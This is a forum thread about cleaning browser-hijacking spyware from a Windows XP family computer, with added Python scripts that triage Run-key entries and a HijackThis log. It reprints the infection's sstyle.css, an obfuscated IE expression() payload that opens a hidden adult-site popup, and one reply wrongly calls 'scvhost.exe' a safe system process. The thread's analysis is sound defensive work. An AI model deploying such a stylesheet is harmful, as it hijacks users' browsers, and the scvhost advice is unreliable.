Guh, stupid spyware!

Not my fault this time. I highly suspect it was my father’s fault this time.

In this case, I’m using a Windows XP Home box with eight different user accounts, ALL of them admin accounts. Dad refuses to have it any other way, and it is his computer…

I’ve been running Adaware and Spybot to get rid of it, and they do. But it always loads back in every time a user logs in, and it’s getting annoying. It keeps posting links on the desktop and hijacking the home page to “www.your-search.info”. Otherwise I’m not sure what strain it is.

Mreh. Anyone have any ideas on how I could clean this stupid thing?

I’m currently having a very similar problem. This stuff just regenerates, and Adaware seems incapable of removing some DLLs that it really should. I might just wipe the hard drive. It’s overdue anyway.

Run the computer in safe mode, then run adaware and spybot.

What’s probably happened is that the spyware has gotten into the startup routine of one or more user accounts, which can be a major pain with AdAware since I’ve noticed it seems to have trouble dealing with spyware in the startup programs. Here’s what you want to do:

  1. Restart the computer and log in. This is important, since you want to be absolutely sure that only one session has been activated on this boot-up.
  2. Close every program you can: all those little icons in your taskbar, if when you right-click on them you have a close or exit option, close them. You should also close Explorer, but if you know what you’re doing then it shouldn’t be a problem if you don’t.
  3. Press Ctrl-Alt-Delete once; the Task Manager will pop up. Click on the Processes tab.
  4. You’re going to see a list of every process that’s currently running on the computer (this is why I wanted you to restart, to make sure that only one user is active; it makes this easier). Your task now is to find which process corresponds to the spyware you’re trying to remove. Here are a few tips:
     Processes with SYSTEM as the user are OK, ignore them.
     taskmgr is Task Manager, don’t close that.
     EXPLORER.EXE is Windows, don’t close that.
     iexplore.exe is Internet Explorer, don’t close that if you’re reading this.

     Your spyware is one of the other ones (if you closed everything you can like I suggested, then there shouldn’t be that many).
  5. Close the processes you think are causing the problem one at a time, making sure to write down the name of the process on a piece of paper (more on this later). After each process you kill, do something that normally gives you a reaction from it (just don’t reboot). If you see popups, or your homepage gets changed, for example, then you didn’t get the right one. If however all your problems stop then you probably found it. Once you do, move on to the next step.
  6. You’ve now killed the spyware for this session, but as soon as you reboot it’ll be back. Now what we want to do is get rid of it for good. Click on Start -> Run, type msconfig and click OK.
  7. A new window will load up. This is the ever so wonderful startup configuration utility that so mysteriously vanished from the System Information tools menu under XP. Click on the Startup tab.
  8. What you want to do now is scroll down the list of programs and uncheck the one that matches the name of the spyware you wrote down (easier to remember if you write it; make sure not to uncheck anything that looks important). This will prevent the program from loading when you reboot. Once you’ve unchecked it, click OK.
  9. Now you want to restart the computer and log in as the same user you were working with before. Again try doing the same actions that normally give you popups or other problems. If you’re not getting any then your problem is solved and you can move on to the last steps. If however you still have the same problems then go back to step 2 and try again (you might consider rechecking the program you unchecked in msconfig; if it wasn’t your source of trouble it might be important for something else).
  10. Restart and log into one of the other accounts to make sure the problem is gone there as well. If it isn’t then go back to step 2 and keep looking; if it is, then move on to the final step.
  11. Then, once you’re sure that the problem is gone, load up msconfig again and take a look at the path of the spyware you disabled. Now that it’s not constantly in use you can actually go and delete it. So follow the path indicated and go kill the little bugger.

And that should do it, if you have any more problems just repost and I’ll see what I can do.
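The procedure above, as an added example (not DarkSand's code, and not part of the original post): it takes a snapshot of the Processes tab and of the Run keys that msconfig's Startup tab lists, applies the same filters (ignore SYSTEM/LOCAL SERVICE/NETWORK SERVICE, never touch taskmgr/explorer/iexplore) and then maps each remaining process to the Run entry that launches it. Two things the steps do not spell out are built in: the Startup tab shows the registry value name, which need not look like the process name, so the match is made on the executable in the command line; and an entry under HKLM runs for every account that logs in, while HKCU runs only for one, which is what to look at when the same thing reappears for all eight users. The process list and Run entries are constructed; `example.exe` is hypothetical, and `systeminit.exe` under `C:\WINDOWS\system` is taken from the HijackThis log posted later in the thread purely as the suspect to chase, because its value name mimics a system DLL and its path is outside Program Files, which is the kind of entry step 8 asks you to scrutinise. The script does not establish what that file is.

```python
"""Startup-entry triage modelled on DarkSand's steps 4-11 (added example)."""
import ntpath
import re

# Accounts that run Windows' own services; step 4 says to ignore these.
SERVICE_ACCOUNTS = {"SYSTEM", "LOCAL SERVICE", "NETWORK SERVICE"}

# Processes step 4 says not to kill.
KEEP = {"taskmgr.exe", "explorer.exe", "iexplore.exe"}

# Constructed snapshot of the Processes tab: (image name, user name).
PROCESSES = [
    ("svchost.exe", "SYSTEM"),
    ("svchost.exe", "NETWORK SERVICE"),
    ("explorer.exe", "Bobby"),
    ("taskmgr.exe", "Bobby"),
    ("iexplore.exe", "Bobby"),
    ("jusched.exe", "Bobby"),       # Java update scheduler, benign
    ("systeminit.exe", "Bobby"),    # the suspect; taken from the HJT log later on
]

# Constructed Run-key listing as msconfig's Startup tab shows it:
# (hive, value name, command line).  The HKCU entry is hypothetical.
RUN_ENTRIES = [
    ("HKLM", "SunJavaUpdateSched",
     r"C:\Program Files\Java\j2re1.4.2_03\bin\jusched.exe"),
    ("HKLM", "system32.dll", r"C:\WINDOWS\system\systeminit.exe"),
    ("HKCU", "Example", r'"C:\Documents and Settings\Bobby\example.exe" /silent'),
]


def image_name(command):
    """Lower-cased executable name from a Run-key command line.

    Handles a quoted path with arguments and an unquoted path that contains
    spaces (HijackThis prints Program Files paths unquoted).
    """
    command = command.strip()
    if command.startswith('"'):
        exe = command[1:].split('"', 1)[0]
    else:
        m = re.match(r"(.*?\.exe)\b", command, re.I)
        exe = m.group(1) if m else command.split(" ", 1)[0]
    return ntpath.basename(exe).lower()


def candidate_processes(processes):
    """Step 4: drop service-account processes and the three keep-alive ones."""
    return sorted({
        name.lower()
        for name, user in processes
        if user.upper() not in SERVICE_ACCOUNTS and name.lower() not in KEEP
    })


def match_startup(processes, run_entries):
    """Steps 6-11: map each remaining process to the Run entry that starts it.

    Returns {image: [(hive, value name, command line, scope), ...]} so the
    caller knows what to untick in msconfig, the path to delete afterwards,
    and whether the entry fires for every account (HKLM) or one (HKCU).
    """
    wanted = set(candidate_processes(processes))
    found = {}
    for hive, name, command in run_entries:
        image = image_name(command)
        if image in wanted:
            scope = "every account" if hive == "HKLM" else "this account only"
            found.setdefault(image, []).append((hive, name, command, scope))
    return found


if __name__ == "__main__":
    print("candidates:", candidate_processes(PROCESSES))
    for image, entries in match_startup(PROCESSES, RUN_ENTRIES).items():
        for hive, name, command, scope in entries:
            print(f"{image}: untick [{name}] under {hive} ({scope}); file: {command}")
```

A process with no matching Run entry is not cleared by this; it may be started from a service, a Winlogon notify entry or a scheduled task, which msconfig's Startup tab does not list, so the absence of a match is a reason to look further, not to stop.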

Where would us uncomputer savvy people be without DarkSand? (We need a bowing sprite) I’m not worthy, I’m not worthy!

I use spykiller, myself. Of course, I have yet to verify its effectiveness with another scan. We will see what happens next.

Okay, now I feel stupid. I should have specified that I’m not retarded. I know the basic Windows functions. I keep my processes down to the system minimum for my gaming already.

You don’t need to quote my entire post Caleb. Besides, that was for StarStorm, if you want help you’re going to have to be a lot less vague about what your problem is.

Shut off ActiveX! It’s so incredibly insecure; MS should have their heads examined.

Hmmm… I was having similar problems, and though I knew how to do the whole system startup thing, I can’t believe I forgot to try it out -_-

No matter, just did, and let’s see if it worked.

Hmmm, I’ll have to find out what causes a reaction from it. All I have right now is that it keeps loading the stupid links and changing the home page with each new user. Thanks for the advice, Dark Sand. I’ll try it out.

Before you start killing processes in msconfig, I do suggest that you do a quick search in google or something to see if they’re actually spyware processes. It never hurts to look.

Poor Spazzy, you are having the same problem I had a few weeks ago. The problem I received was the result of my sister checking out WWE websites that have the very evil popup program Purity Test (fake porn program), which sends in various other evil spyware. I tried Adaware, which worked on other programs, but did not destroy Purity Test. But that was when I discovered “Hijack This”, a very nice free program you can get at Download.com (type the name Hijack This in the search). It destroyed Purity Test and made sure that none of this crap ever happened again. But I might consider checking out the computer later using some of Dark Sand’s advice to see if Purity left a memento.

Actually, I watched Spybot work. It takes that too.

Sorry for the double post.

The home page I keep getting is “http://www.your-search.info/start.html”

This is the task list I keep getting, with nothing running:

I found one thing suspect: “CFD.exe”, which has the folder “C:\Program Files\BroadJump\Client Foundation”

So I deleted it after running a search on it. I hope it wasn’t important.

I also thought I had “scvhost.exe” but lucky me. I was mistaken.

So any ideas Dark Sand?

Don’t touch scvhost.exe, that manages network connections (which is why it’s under a SYSTEM, NETWORK SERVICE or LOCAL SERVICE username). Looking at this list, the most likely candidate that comes to mind would be LVcomS.exe; that’s the type of filename you’d expect for this kind of spyware. Try killing that. If that doesn’t work you can try jusched.exe and ALogServ.exe; those are the only two other processes which I can’t think of what they might do. I have a good idea what the other processes do.

CFD.exe was a good guess, it’s probably the first one I would have tried, it also has a path like you’d expect for a piece of spyware, even if that’s not your source of problem it was probably another piece of spyware you weren’t aware of.

LVcomS.exe is my webcam.
jusched.exe seems to be the Java Virtual Machine.
AlogServ.exe seems to be linked to the McAfee AntiVirus.

One interesting thing that I keep getting, however, in msconfig is “D:\Vsc\setup.exe” /RUNKEY, in the location SOFTWARE/Microsoft/Windows/CurrentVersion/Run

I’m going to try disabling that and rebooting with the traces cleaned off… I’m starting to think that this only runs during bootup and ends before I actually start my session. Well we’ll find out…

Edit: ok, not it. But I found something interesting due to HijackThis!. I’m going to fuck with it and see what happens:

Logfile of HijackThis v1.97.7
Scan saved at 12:11:07 AM, on 3/28/2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\McAfee\McAfee VirusScan\Avsynmgr.exe
C:\WINDOWS\System32\gearsec.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Java\j2re1.4.2_03\bin\jusched.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\Common Files\Logitech\QCDriver2\LVCOMS.EXE
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\McAfee\McAfee VirusScan\alogserv.exe
C:\Program Files\Logitech\ImageStudio\LogiTray.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\McAfee\McAfee VirusScan\Avconsol.exe
C:\Program Files\Logitech\ImageStudio\LowLight.exe
C:\Documents and Settings\Bobby\My Documents\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.your-search.info/search.html
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.your-search.info/start.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.your-search.info/start.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.your-search.info/search.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.your-search.info/search.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://www.your-search.info/search.html
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.your-search.info/start.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.your-search.info/search.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.your-search.info/search.html
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = http://www.your-search.info/search.html
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.your-search.info/search.html
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM…\Run: [system32.dll] C:\WINDOWS\system\systeminit.exe
O4 - HKLM…\Run: [SunJavaUpdateSched] C:\Program Files\Java\j2re1.4.2_03\bin\jusched.exe
O4 - HKLM…\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM…\Run: [LVCOMS] C:\Program Files\Common Files\Logitech\QCDriver2\LVCOMS.EXE
O4 - HKLM…\Run: [LogitechGalleryRepair] C:\Program Files\Logitech\ImageStudio\ISStart.exe
O4 - HKLM…\Run: [iTunesHelper] C:\Program Files\iTunes\iTunesHelper.exe
O4 - HKLM…\Run: [BJCFD] C:\Program Files\BroadJump\Client Foundation\CFD.exe
O4 - HKLM…\Run: [Alogserv] C:\Program Files\McAfee\McAfee VirusScan\alogserv.exe
O4 - HKLM…\Run: [LogitechImageStudioTray] C:\Program Files\Logitech\ImageStudio\LogiTray.exe
O9 - Extra ‘Tools’ menuitem: Sun Java Console (HKLM)
O9 - Extra button: Messenger (HKLM)
O9 - Extra ‘Tools’ menuitem: Yahoo! Messenger (HKLM)
O9 - Extra button: ICQ Pro (HKLM)
O9 - Extra ‘Tools’ menuitem: ICQ (HKLM)
O9 - Extra button: AIM (HKLM)
O9 - Extra button: Real.com (HKLM)
O9 - Extra button: Messenger (HKLM)
O9 - Extra ‘Tools’ menuitem: Windows Messenger (HKLM)
O16 - DPF: {166B1BCA-3F9C-11CF-8075-444553540000} (Shockwave ActiveX Control) - http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
O16 - DPF: {30528230-99F7-4BB4-88D8-FA1D4F56A2AB} (YInstStarter Class) - http://download.yahoo.com/dl/installs/yinst0401.cab
O16 - DPF: {33564D57-0000-0010-8000-00AA00389B71} - http://download.microsoft.com/download/F/6/E/F6E491A6-77E1-4E20-9F5F-94901338C922/wmv9VCM.CAB
O16 - DPF: {4D7F48C0-CB49-4EA6-97D4-04F4EACC2F3B} (InstallShield Setup Player 2K2) - http://www.ipswitch.com/_installs/wsftp_le/setup.exe
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} (Update Class) - http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?38013.2096875
O16 - DPF: {AE1C01E3-0283-11D3-9B3F-00C04F8EF466} (HeartbeatCtl Class) - http://fdl.msn.com/zone/datafiles/heartbeat.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
O16 - DPF: {D719897A-B07A-4C0C-AEA9-9B663A28DFCB} (iTunesDetector Class) - http://ax.phobos.apple.com.edgesuite.net/detection/ITDetector.cab
O16 - DPF: {F54C1137-5E34-4B95-95A5-BA56D4D8D743} (Secure Delivery) - http://www.gamespot.com/KDX/kdx.cab
O19 - User stylesheet: C:\WINDOWS\sstyle.css
O19 - User stylesheet: C:\WINDOWS\sstyle.css (HKLM)

The info on sstyle.css?

@charset "iso-8859-1";
body{border-color:expression(dMT=document.getElementsByTagName('META'),dMT.length?(dMT.keywords?(dMTkc=dMT.keywords.content,(dMTkc.indexOf('sex')>=0||dMTkc.indexOf('porn')>=0 ||dMTkc.indexOf('adult')>=0||dMTkc.indexOf('thehun')>=0)?(window.open('http://%77%77%77%2E%74%68%65%62%65%73%74%73%65%2E%63%6F%6D/%63%6Fn%73%6Fl%65%2Ep%68p','hvo','x=5000,top=5000,y=5000,left=5000,height=600,width=800,directories=no,toolbar=no,status=no,location=no,resizable=no,menubar=no,scrollbars=no')?document.getElementsByTagName('META').keywords.content='':''):''):''):'')}

Hmm I wonder… Another to check out…

Edit #2: Ugh, that’s not it either. I haven’t killed my comp though…
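An added example, not part of the thread and not HijackThis's own logic, that reads the kind of log posted above and pulls out the three things worth acting on. First, the R0/R1 lines: the same your-search.info URLs are set under both HKCU and HKLM, and the HKLM copies apply to every account on the box, which fits the "comes back for each new user" symptom. Second, the O4 lines, with a path heuristic in the spirit of DarkSand's advice: an executable launched from somewhere other than Program Files or System32, or a Run value named like a Windows component (here `system32.dll` pointing at `C:\WINDOWS\system\systeminit.exe`), is flagged for a closer look; the heuristic says "look here", not "this is malware". Third, the O19 user stylesheet and its `expression()`: that is an Internet Explorer-only CSS extension that evaluates the embedded JavaScript every time IE recalculates the page's style, and a user stylesheet registered this way is applied to every page IE renders. The script decodes the percent-encoded `window.open` target (it is `http://www.thebestse.com/console.php`), lists the META-keyword triggers, and parses the window features, which place the popup at 5000,5000, off-screen. The log excerpt and stylesheet are copied from the posts above with straight quotes; the trusted-directory list is this example's own choice.

```python
"""HijackThis log and sstyle.css triage (added example, not HijackThis code)."""
import re
from urllib.parse import unquote

# Constructed excerpt of the log posted above.
HJT_LOG = r"""
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.your-search.info/search.html
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.your-search.info/start.html
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.your-search.info/start.html
O4 - HKLM\..\Run: [system32.dll] C:\WINDOWS\system\systeminit.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Program Files\Java\j2re1.4.2_03\bin\jusched.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O19 - User stylesheet: C:\WINDOWS\sstyle.css (HKLM)
"""

# The stylesheet posted above, with straight quotes.
SSTYLE_CSS = r"""@charset "iso-8859-1";
body{border-color:expression(dMT=document.getElementsByTagName('META'),dMT.length?(dMT.keywords?(dMTkc=dMT.keywords.content,(dMTkc.indexOf('sex')>=0||dMTkc.indexOf('porn')>=0 ||dMTkc.indexOf('adult')>=0||dMTkc.indexOf('thehun')>=0)?(window.open('http://%77%77%77%2E%74%68%65%62%65%73%74%73%65%2E%63%6F%6D/%63%6Fn%73%6Fl%65%2Ep%68p','hvo','x=5000,top=5000,y=5000,left=5000,height=600,width=800,directories=no,toolbar=no,status=no,location=no,resizable=no,menubar=no,scrollbars=no')?document.getElementsByTagName('META').keywords.content='':''):''):''):'')}
"""

# Directories this example treats as expected homes for startup programs.
TRUSTED_DIRS = ("c:\\program files\\", "c:\\windows\\system32\\")


def hijacked_urls(log):
    """R0/R1 lines: {hive: set of URLs IE has been pointed at}."""
    out = {}
    for m in re.finditer(r"^R[01] - (HK\w+)\\.*? = (\S+)$", log, re.M):
        out.setdefault(m.group(1), set()).add(m.group(2))
    return out


def command_image(command):
    """Executable path from a Run command line (quoted or unquoted with spaces)."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:].split('"', 1)[0]
    m = re.match(r"(.*?\.exe)\b", command, re.I)
    return m.group(1) if m else command.split(" ", 1)[0]


def suspicious_run_entries(log):
    """O4 lines whose executable lives outside TRUSTED_DIRS, or whose value
    name is spelled like a DLL or driver.  Returns [(hive, name, exe_lower)]."""
    flagged = []
    for m in re.finditer(r"^O4 - (HK\w+)\W+Run: \[([^\]]+)\] (.*)$", log, re.M):
        hive, name, command = m.groups()
        exe = command_image(command).lower()
        outside = not exe.startswith(TRUSTED_DIRS)
        mimic = name.lower().endswith((".dll", ".sys"))
        if outside or mimic:
            flagged.append((hive, name, exe))
    return flagged


def user_stylesheets(log):
    """O19 lines: paths of user stylesheets IE applies to every page."""
    return re.findall(r"^O19 - User stylesheet: (.*?)(?: \(HKLM\))?$", log, re.M)


def analyse_expression(css):
    """Decode the window.open target, list the META-keyword triggers and parse
    the window features of an IE CSS expression().  Returns (url, keywords, features)."""
    m = re.search(r"window\.open\('([^']+)','[^']*','([^']*)'\)", css)
    url = unquote(m.group(1)) if m else None
    features = dict(f.split("=", 1) for f in m.group(2).split(",")) if m else {}
    keywords = re.findall(r"indexOf\('([^']+)'\)", css)
    return url, keywords, features


if __name__ == "__main__":
    for hive, urls in hijacked_urls(HJT_LOG).items():
        print(hive, sorted(urls))
    print("flagged O4:", suspicious_run_entries(HJT_LOG))
    print("user stylesheets:", user_stylesheets(HJT_LOG))
    url, keywords, features = analyse_expression(SSTYLE_CSS)
    print("popup target:", url, "triggers:", keywords,
          "position:", features["left"], features["top"])
```

The fix that follows from the O19 finding is to delete `C:\WINDOWS\sstyle.css` and clear the user-stylesheet setting in both the HKCU and HKLM locations HijackThis lists; fixing only the HKCU copy leaves it to come back for the other accounts.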